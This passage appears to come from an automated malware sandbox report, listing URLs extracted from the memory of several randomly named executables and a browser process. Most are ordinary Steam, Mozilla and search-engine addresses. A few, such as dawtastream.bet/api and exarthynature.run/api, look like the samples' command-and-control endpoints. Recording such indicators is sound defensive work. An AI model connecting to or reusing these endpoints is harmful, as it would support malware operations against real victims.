Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2351643497.0000000000D11000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D14000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337768464.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D14000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337768464.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D14000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337768464.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=EtSMwaCZ
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D14000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=VcY-
Source: 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2351643497.0000000000D11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2351643497.0000000000D11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2351643497.0000000000D11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&a
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oLj-OQ5jZ8Wg&l=e
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2351643497.0000000000D11000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2351643497.0000000000D11000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&am
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: firefox.exe, 00000022.00000002.3015140670.0000020F05650000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000003.2864249449.0000020F07B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: 5a20b6327b.exe, 0000000B.00000003.2389533075.000000000564C000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2854932657.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3105196678.0000020F7FB56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: 5a20b6327b.exe, 0000000B.00000003.2407783071.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2401015492.0000000005646000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2408683711.0000000005649000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2854932657.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3105196678.0000020F7FB56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000022.00000003.2951927762.0000020F100EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2951927762.0000020F100CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000022.00000002.3090183170.0000020F77811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: 1e8e57d62a.exe, 0000000C.00000003.2528740100.00000000054B1000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2598720380.0000000000745000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000002.2645413315.0000000000747000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2644043453.0000000000745000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2466099989.00000000006E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dawtastream.bet/
Source: 1e8e57d62a.exe, 0000000C.00000003.2393031714.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2465941395.00000000006C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dawtastream.bet/.
Source: 1e8e57d62a.exe, 0000000C.00000003.2466099989.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000002.2645413315.000000000075B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dawtastream.bet/api
Source: 1e8e57d62a.exe, 0000000C.00000003.2514742020.000000000073E000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2528960586.000000000073E000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2514450674.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dawtastream.bet/apib4
Source: 1e8e57d62a.exe, 0000000C.00000003.2598720380.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dawtastream.bet/apis
Source: 1e8e57d62a.exe, 0000000C.00000003.2466099989.00000000006E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dawtastream.bet/apitB
Source: 1e8e57d62a.exe, 0000000C.00000003.2598720380.0000000000745000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000002.2645413315.0000000000747000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2644043453.0000000000745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dawtastream.bet/er
Source: 1e8e57d62a.exe, 0000000C.00000002.2645413315.0000000000747000.00000004.00000020.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2644043453.0000000000745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dawtastream.bet/pi
Source: 1e8e57d62a.exe, 0000000C.00000003.2466099989.00000000006E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dawtastream.bet/piS
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000022.00000002.3108753623.00000B6D71F04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000022.00000002.3015140670.0000020F05650000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3026645193.0000020F07C26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2864249449.0000020F07B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: 5a20b6327b.exe, 0000000B.00000003.2355489693.000000000567D000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2355371205.0000000005680000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2468664294.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469150428.00000000054FB000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469702182.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2683698825.000000000588B000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2684621863.0000000005888000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802637016.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802526755.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 5a20b6327b.exe, 0000000B.00000003.2355489693.000000000567D000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2355371205.0000000005680000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2468664294.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469150428.00000000054FB000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469702182.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2683698825.000000000588B000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2684621863.0000000005888000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802637016.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802526755.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 5a20b6327b.exe, 0000000B.00000003.2355489693.000000000567D000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2355371205.0000000005680000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2468664294.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469150428.00000000054FB000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469702182.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2683698825.000000000588B000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2684621863.0000000005888000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802637016.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802526755.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000022.00000002.3015140670.0000020F05650000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000022.00000002.3108753623.00000B6D71F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ebay.comP
Source: 9f19f13091.exe, 00000006.00000002.2272584155.000000000347C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://exarthynature.run/
Source: 9f19f13091.exe, 00000006.00000002.2272584155.000000000347C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://exarthynature.run/G
Source: 9f19f13091.exe, 00000006.00000002.2271472152.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, 9f19f13091.exe, 00000006.00000002.2271472152.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp, 9f19f13091.exe, 00000006.00000002.2271452098.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exarthynature.run/api
Source: 9f19f13091.exe, 00000006.00000002.2271472152.0000000000C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exarthynature.run/apia
Source: 9f19f13091.exe, 00000006.00000002.2271472152.0000000000C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exarthynature.run:443/api
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://fb.me/react-polyfillsO
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://fb.me/react-polyfillsP
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://fb.me/react-polyfillsPO
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
